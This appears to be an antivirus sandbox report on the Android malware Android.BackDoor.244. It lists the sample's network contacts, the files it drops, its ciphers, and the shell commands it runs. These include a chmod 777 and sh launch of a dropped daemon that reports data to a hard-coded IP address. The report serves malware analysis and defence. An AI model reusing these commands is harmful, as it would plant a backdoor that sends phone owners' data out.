Technical information
- Android.BackDoor.244
- UDP(DNS) <Google DNS>
- TCP(HTTP/1.1) a####.de####.com:80
- TCP(TLS/1.0) ssl.google-####.com:443
- TCP(TLS/1.0) googl####.g.doublec####.net:443
- a####.de####.com
- googl####.g.doublec####.net
- mt####.go####.com
- ssl.google-####.com
- u.lb####.com
- a####.de####.com/adserver/api/1/adservice?country=####&package=####&devi...
- /data/data/####/.jiagu.ls
- /data/data/####/69A0111B022F000950F2707C9BA7D221.xml
- /data/data/####/7EAB885C0BAD6323.xml
- /data/data/####/ApplicationCache.db-journal
- /data/data/####/CFA461B54791236B50F2707C9BA7D221.xml
- /data/data/####/D8745A09548076ED3E94F780285522EB-journal
- /data/data/####/DC64B5BAF9A922F43E94F780285522EB-journal
- /data/data/####/E36479D637156D733E94F780285522EB
- /data/data/####/E36479D637156D733E94F780285522EB-journal
- /data/data/####/__pasys_remote_banner.tmp.jar
- /data/data/####/ads898692151.jar
- /data/data/####/daemon.t
- /data/data/####/data_0
- /data/data/####/data_1
- /data/data/####/data_2
- /data/data/####/data_3
- /data/data/####/e.zip
- /data/data/####/f_000001
- /data/data/####/gaClientId
- /data/data/####/google_analytics_v4.db-journal
- /data/data/####/index
- /data/data/####/libjiagu.so
- /data/data/####/webview.db-journal
- /data/data/####/webviewCookiesChromium.db-journal
- /data/data/####/webviewCookiesChromiumPrivate.db-journal
- /data/media/####/-1474528227.tmp
- /data/media/####/-1724818779.tmp
- /data/media/####/-1731035409.tmp
- /data/media/####/-1903377490.tmp
- /data/media/####/-449940644.tmp
- /data/media/####/-504706939.tmp
- /data/media/####/-572211812.tmp
- /data/media/####/-717367262.tmp
- /data/media/####/.nomedia
- /data/media/####/1160261106.tmp
- /data/media/####/1386727466.tmp
- /data/media/####/150894517.tmp
- /data/media/####/317027948.tmp
- /data/media/####/317951469.tmp
- /data/media/####/318874990.tmp
- /data/media/####/319798511.tmp
- /data/media/####/320722032.tmp
- /data/media/####/566772860.tmp
- /data/media/####/657417482.tmp
- /data/media/####/672552084.tmp
- /data/media/####/849844931.tmp
- /data/media/####/XH.txt
- /data/media/####/d.txt
- /data/media/####/dd.zip (deleted)
- /data/media/####/n.zip
- /data/media/####/tn.zip
- <Package Folder>/files/daemon -p <Package> -r am startservice --user 0 -n <Package>/vdc.od.f.Really -e key daemon -h http://52.11.99.233:7123/report/allData -m -i 2074
- chmod 777 <Package Folder>/files/daemon
- sh <Package Folder>/files/daemon -p <Package> -r am startservice --user 0 -n <Package>/vdc.od.f.Really -e key daemon -h http://52.11.99.233:7123/report/allData -m -i 2074
- bblztave
- libjiagu
- DES
- RSA-ECB-PKCS1Padding
- AES-CBC-PKCS5Padding
- DES